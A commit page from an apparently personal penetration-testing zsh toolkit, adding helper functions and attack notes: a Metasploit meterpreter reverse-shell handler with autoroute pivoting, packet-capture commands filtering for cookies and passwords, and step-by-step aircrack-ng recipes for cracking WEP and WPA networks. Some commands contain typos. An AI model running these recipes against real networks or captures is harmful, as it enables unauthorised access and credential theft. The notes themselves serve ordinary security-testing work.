six
/
PTZ
1
0
Fork 0
Code Issues Pull Requests Releases Wiki Activity

n function and dep checking

master
51x 2017-01-15 23:23:28 +01:00
parent 7cdc1d5512
commit 85d6e65b5d
8 changed files with 190 additions and 39 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

42
README.md
View File

@ -9,22 +9,37 @@ Usability features: tor trigger (ton/tof), external ip check, tor check... and m
Note: this project is a work in progress which we develop with one of my friend in our free time. If you use it, be prepared for some glitches. Note: this project is a work in progress which we develop with one of my friend in our free time. If you use it, be prepared for some glitches.
Works on Debian if the dependencies are met or on Kali. Probably works on Pentoo also. Works on Debian if the dependencies are met or on Kali. Probably works on Pentoo also. If the dependencies are not met, the functions will still run, but outputs will be empty - at least in the currently status.
Installing full console after you have the dependencies: cp profile_files/.* -R ~/
Using only the pentest function can be done by including: pentest_functions.zsh
Functions Install
========= =======
pawnpls - Automatically enumerate and start predefined attacks such as brute force. Full console install: git clone https://github.com/51x/PTZ && cd PTZ && cp profile_files/.* -R ~/
Using only the pentest functions can be done by including just: pentest_functions.zsh
If you want also the notes/knowledge database, you shoul add the v3das folder to you ~/.ptz/ folder.
General function of PTZ
=======================
pawnpls - Automatically enumerate and start predefined attacks such as brute force. Output goes to ~/.ptz/$target/
Example for single target: autopawn n0nexi-stent.com Example for single target: autopawn n0nexi-stent.com
Example for multiple targets: autopawn "n0nex-1.com n0nex-2.com" Example for multiple targets: autopawn "n0nex-1.com n0nex-2.com"
everythingworksornot\? - check if everything works or not for this script (tbd) ptzdepchk - check if all dependencies are installed or not, print if something is missing
Notes functions
===============
n - query notes about a topic, use tab auto complete
nls - list all the notes
rnd - get random strings (lengths: 8,16,32,64)
chk functions chk functions
@ -45,12 +60,3 @@ johnzip - Crack zip files using john
johnrar - Crack rar files using john johnrar - Crack rar files using john
Example: johnrar data.rar rockyou.txt Example: johnrar data.rar rockyou.txt
help functions
==============
hlp - Get help of the hlp command
hlprnd - Get random strings (lengths: 8,16,32,64)
hlp <var> - Get help about <var> - not yet implemented
i - Get information about a topic, use tab after i

3
profile_files/.ptz/v3das/_n 100644
View File

@ -0,0 +1,3 @@
#compdef n
_arguments "1: :( $(ls ~/.ptz/v3das/ ) )"

17
profile_files/.ptz/v3das/metasploit_meterpreter_pivoting.txt 100644
View File

@ -0,0 +1,17 @@
# With "autoroute" it is possible to attack through the remote machine.
# Start handler
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 10.1.1.1
# Add route to which network you want to look into
run autoroute -s 10.2.2.0/24
run autoroute -p
# Scan
use auxiliary/scanner/portscan/tcp
set RHOSTS 10.2.2.0/24
set THREADS 50
set ports 20,21,22,25,53,69,80,139,443,445,993,8080

7
profile_files/.ptz/v3das/network_sniffing_tcpdump_examples.txt 100644
View File

@ -0,0 +1,7 @@
tcpdump -r file.cap -vvvs 1024 -l -A host example.com | grep -i cookie
tcpdump -r file.cap -vvvs 1024 -l -A | egrep -i "host:|cookie:"
tcpdump -r file.cap -s 1024 -l -A dst domain.com
tcpdump -A # show raw data

11
profile_files/.ptz/v3das/network_sniffing_tshark_examples.txt 100644
View File

@ -0,0 +1,11 @@
# tshark follow stream
tshark -r <capture file> -R "<filter>" -T fields -e tcp.stream
tshark -q -r http.pcapng -z follow,tcp,ascii,1
# etc
tshark grep from http
tshark -r file.cap 'http' | egrep -i "login|pass"
tshark 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)'
tshark 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)' -R'http.request.method == "GET" || http.request.method == "HEAD"'

7
profile_files/.ptz/v3das/network_switch_cisco_reset.txt 100644
View File

@ -0,0 +1,7 @@
# reset a cisco switch
flash_init
dir flash:
rename flash:config.text flash:config.backup
boot

75
profile_files/.ptz/v3das/network_wireless_cracking_aircrack.txt 100644
View File

@ -0,0 +1,75 @@
# cracking WEP with clients
airmon-ng start wlan0 $AP_CHANNEL
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $FILENAME mon0
aireplay-ng -1 0 -e $AP_ESSID -a $AP_MAC -h $SELF_MAC mon0 # Fake-auth
aireplay-ng -3 -b $AP_MAC -h $SELF_MAC mon0 # ARP Replay attack
aireplay-ng -0 1 -a $AP_MAC -c $CLIENT_MAC mon0 # Deauthentication to get an ARP packet faster
aircrack-ng -0 $CAP_FILE
# cracking WEP via a client
airmon-ng start wlan0 $AP_CHANNEL
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $FILENAME mon0
aireplay-ng -1 0 -e $AP_ESSID -a $AP_MAC -h $SELF_MAC mon0 # Fake auth
aireplay-ng -2 -b $AP_MAC -d FF:FF:FF:FF:FF:FF -f 1 -m 68 -n 86 mon0 # Interactive packet reply attack
aircrack-ng -0 -z -n 64 $CAP_FILE
# clientless WEP cracking
airmon-ng start wlan0 $AP_CHANNEL
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $FILENAME mon0
aireplay-ng -1 0 -e $AP_ESSID -a $AP_MAC -h $SELF_MAC mon0 # Fake-auth
aireplay-ng -5 -b $AP_MAC -h $SELF_MAC mon0 # Fragmentation attack for PRGA
aireplay-ng -4 -b $AP_MAC -h $SELF_MAC mon0 # If Frag attack fails, use Korek ChopChop attack for PRGA
packetforge-ng -0 -a $AP_MAC -h $SELF_MAC -l $SOURCE_IP -k $DESTINATION_IP -y $XOR_FILENAME -w $PACKET_FILENAME # After got PRGA
aireplay-ng -2 -r $PACKET_FILENAME mon0 # Interactive packet reply after crafted the packet
aircrack-ng -0 $CAP_FILE
# bypassing WEP SKA
airmon-ng start wlan0 $AP_CHANNEL
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $FILENAME mon0
aireplay-ng -0 1 -a $AP_MAC -c $CLIENT_MAC mon0 # Deauthentication attack for PRGA xor file
aireplay-ng -1 60 -e $AP_ESSID -y $PRGA_FILENAME -a $AP_MAC -h $SELF_MAC mon0 # Shared key fake auth attack
aireplay-ng -3 -b $AP_MAC -h $SELF_MAC mon0 # ARP Replay attack
aireplay-ng -0 1 -a $AP_MAC -c $CLIENT_MAC mon0 # Deauthentication to get an ARP packet faster
aircrack-ng -0 -z -n 64 $CAP_FILE
# cracking WPA PSK
airmon-ng start wlan0 $AP_CHANNEL
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $FILENAME mon0
aireplay-ng -0 1 -a $AP_MAC -c $CLIENT_MAC mon0 # Deauthentication to get a 4 way handshake
airacrack-ng -0 -w $WORDLIST $CAPTURE_FILE
# cracking WPA with John The Ripper
airmon-ng start wlan0 $AP_CHANNEL
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $FILENAME mon0
aireplay-ng -0 1 -a $AP_MAC -c $CLIENT_MAC mon0 # Deauthentication to get a 4 way handshake
# change to password folder
vim john.conf # Edit "List.Rules:Wordlist" --> add regex for more words eg. "$[0-9]$[0-9]"
./john --worldlist=$WORDLIST --rules --stdout | aircrack-ng -0 -e $AP_ESSID -w $CAPTURE_FILE
# cracking WPA with coWPAtty
airmon-ng start wlan0 $AP_CHANNEL
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $FILENAME mon0
aireplay-ng -0 1 -a $AP_MAC -c $CLIENT_MAC mon0 # Deauthentication to get a 4 way handshake
cowpatty -r $CAPTURE_FILE -f $WORDLIST -2 s $AP_ESSID
genpmk -f $WORDLIST -d HASH_FILENAME -s $AP_ESSID # Gen WPA hashes for rainbow attack
cowpatty -r $CAPTURE_FILE -d HASH_FILENAME -2 -s $AP_ESSID # Start the rainbow attack
# cracking WPA with pyrit
airmon-ng start wlan0 $AP_CHANNEL
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $FILENAME mon0
aireplay-ng -0 1 -a $AP_MAC -c $CLIENT_MAC mon0 # Deauthentication to get a 4 way handshake
pyrit list_cores
pyrit -r $CAPTURE_FILE -i $WORDLIST -b $AP_MAC attack_passthrough
pyrit -i $WORDLIST import_password # Import the wordlist to the database
pyrit -e $AP_ESSID create_essid # Add ESSID to the database
pyrit batch
pyrit -r $CAPTURE_FILE attack_db

67
profile_files/.zsh/pentest_functions.zsh
View File

@ -1,26 +1,54 @@
# Experimental version!
debug=1 debug=1
function everythingworksornot"?" { fpath=(~/.ptz/v3das $fpath)
echo "really?" autoload -U compinit
# tba: dependency checks for all functions compinit
zstyle ':completion:*' menu select=2
function nls {
echo "You can get help from the following topics:"
for f in ~/.ptz/v3das/* ; do
echo $f | rev | cut -d'/' -f1 | rev |cut -d'.' -f1
done
} }
function i { function n {
# query knowledgebase, use tab after n
if [ -d "~/.ptz/v3das" ] if [ -d "~/.ptz/v3das" ]
then then
cat ~/.ptz/v3das/ echo "knowledge base / notes are missing"
else
cat ~/.ptz/v3das/$1
fi fi
} }
function hlp { function ptzdepchk {
echo "this function is not yet implemented" # check if dependencies are met or not
if [ $# -ne 1 ] type john >/dev/null 2>&1 || { echo >&2 "john is missing."; }
then type zip >/dev/null 2>&1 || { echo >&2 "zip is missing."; }
echo "this function is not yet implemented" type rar >/dev/null 2>&1 || { echo >&2 "rar is missing."; }
return type wget >/dev/null 2>&1 || { echo >&2 "wget is missing."; }
fi type openssl >/dev/null 2>&1 || { echo >&2 "openssl is missing."; }
type torsocks >/dev/null 2>&1 || { echo >&2 "torsocks is missing."; }
type tor >/dev/null 2>&1 || { echo >&2 "tor is missing."; }
type traceroute >/dev/null 2>&1 || { echo >&2 "traceroute is missing."; }
type theharvester >/dev/null 2>&1 || { echo >&2 "theharvester is missing."; }
type dnsenum >/dev/null 2>&1 || { echo >&2 "dnsenum is missing."; }
type fierce >/dev/null 2>&1 || { echo >&2 "fierce is missing."; }
type nmap >/dev/null 2>&1 || { echo >&2 "nmap is missing."; }
type searchsploit >/dev/null 2>&1 || { echo >&2 "searchsploit is missing."; }
type unzip >/dev/null 2>&1 || { echo >&2 "unzip is missing."; }
#type dig >/dev/null 2>&1 || { echo >&2 "dig is missing."; }
#type curl >/dev/null 2>&1 || { echo >&2 "curl is missing."; }
#type arachni >/dev/null 2>&1 || { echo >&2 "arachni is missing."; }
#type hydra >/dev/null 2>&1 || { echo >&2 "hydra is missing."; }
type python >/dev/null 2>&1 || { echo >&2 "python is missing."; }
#type dirb >/dev/null 2>&1 || { echo >&2 "dirb is missing."; }
} }
@ -35,11 +63,13 @@ function tof {
function tip { function tip {
# check if tor is really used or not
wget -qO- https://check.torproject.org/ -U "Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0" | egrep -i "Congratulations. This browser is configured to use Tor.|Sorry. You are not using Tor." | uniq wget -qO- https://check.torproject.org/ -U "Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0" | egrep -i "Congratulations. This browser is configured to use Tor.|Sorry. You are not using Tor." | uniq
} }
function wip { function wip {
# check public ip
if [ $RANDOM -gt $RANDOM ] if [ $RANDOM -gt $RANDOM ]
then then
wget -qO- -U "Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0" ipecho.net/plain wget -qO- -U "Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0" ipecho.net/plain
@ -52,6 +82,7 @@ function wip {
function chkhttpz { function chkhttpz {
# http response checks from a given host / port
echo "HTTP responses" echo "HTTP responses"
wget --spider -S "http://$1:$2/" 2>&1 | grep "HTTP/" wget --spider -S "http://$1:$2/" 2>&1 | grep "HTTP/"
@ -61,19 +92,13 @@ function chkhttpz {
function chkcrt { function chkcrt {
# check ssl certificate of a server
openssl s_client -showcerts -connect $1:$2 openssl s_client -showcerts -connect $1:$2
} }
function hlp { function rnd {
echo "You can get help from the following topics:" # get some random characters
for f in ~/.ptz/v3das/* ; do
echo $f | rev | cut -d'/' -f1 | rev |cut -d'.' -f1
done
}
function hlprnd {
cat /dev/urandom | tr -dc _A-Z-a-z-0-9 | head -c${1:-8};echo; cat /dev/urandom | tr -dc _A-Z-a-z-0-9 | head -c${1:-8};echo;
cat /dev/urandom | tr -dc _A-Z-a-z-0-9 | head -c${1:-16};echo; cat /dev/urandom | tr -dc _A-Z-a-z-0-9 | head -c${1:-16};echo;
cat /dev/urandom | tr -dc _A-Z-a-z-0-9 | head -c${1:-32};echo; cat /dev/urandom | tr -dc _A-Z-a-z-0-9 | head -c${1:-32};echo;